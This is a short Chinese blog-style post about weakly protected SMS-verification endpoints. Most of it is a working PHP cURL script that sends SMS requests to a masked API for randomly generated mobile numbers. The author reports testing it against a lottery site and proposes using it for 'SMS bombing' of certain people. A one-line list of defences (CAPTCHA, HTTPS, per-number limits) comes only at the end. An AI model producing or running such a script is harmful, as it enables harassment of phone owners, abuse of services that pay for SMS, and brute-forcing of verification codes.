目前很多小网站的短信发送接口还比较low,既没有图形验证码,短信验证又比较短,很轻易就被脚本攻击,多次访问接口发送短信,然后暴力破解验证码。之前的抽奖接口就被匿名人士访问了上亿次。这里很简单就可以做一个暴力接口短信访问脚本:
<?php
$url = "http://XXXXXXXXXXXXXXXXXXXX";//有短信请求的API
for($i = 0; $i < 4; $i ++) {
$mobile = "1371". mt_rand(0000000, 9999999);
$post = array("mobile" => $mobile);
$res = query($url, array(), $post);
$res = json_decode($res, true);
$msg = iconv('UTF-8', 'GB2312', $res["message"]);
echo $mobile;
echo "\n\t";
echo $msg;
}
function query($url, $get=array(), $post = array()) {
$urlPrefix = $url;
$query = http_build_query($get);
$url = $urlPrefix.(strpos($urlPrefix, "?") ? "&" : "?") . $query;
$opt = array(
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_HEADER => FALSE,
CURLOPT_FOLLOWLOCATION => FALSE,
CURLOPT_ENCODING => "",
CURLOPT_AUTOREFERER => TRUE,
CURLOPT_CONNECTTIMEOUT => 1,
CURLOPT_TIMEOUT => 5,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_SSL_VERIFYPEER => FALSE,
CURLOPT_VERBOSE => FALSE,
);
$ch = curl_init();
curl_setopt_array($ch, $opt);
curl_setopt($ch, CURLOPT_URL, $url);
if($post) {
$post = http_build_query($post);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
$raw = curl_exec($ch);
$errno = curl_errno($ch);
if ($errno == CURLE_COULDNT_CONNECT) {
echo "connect wrong {$url}";
die();
}
return $raw;
}
本人随便测试了个彩票网站接口,竟然可以连续发短信,我想可以利用这个对某些人进行短信轰炸了!
一般注册网页均采用https的安全连接,发短信前有图形验证码,同一号码不能请求多次等情况,很多方式可以避免,在设计注册和登录上要特别注意。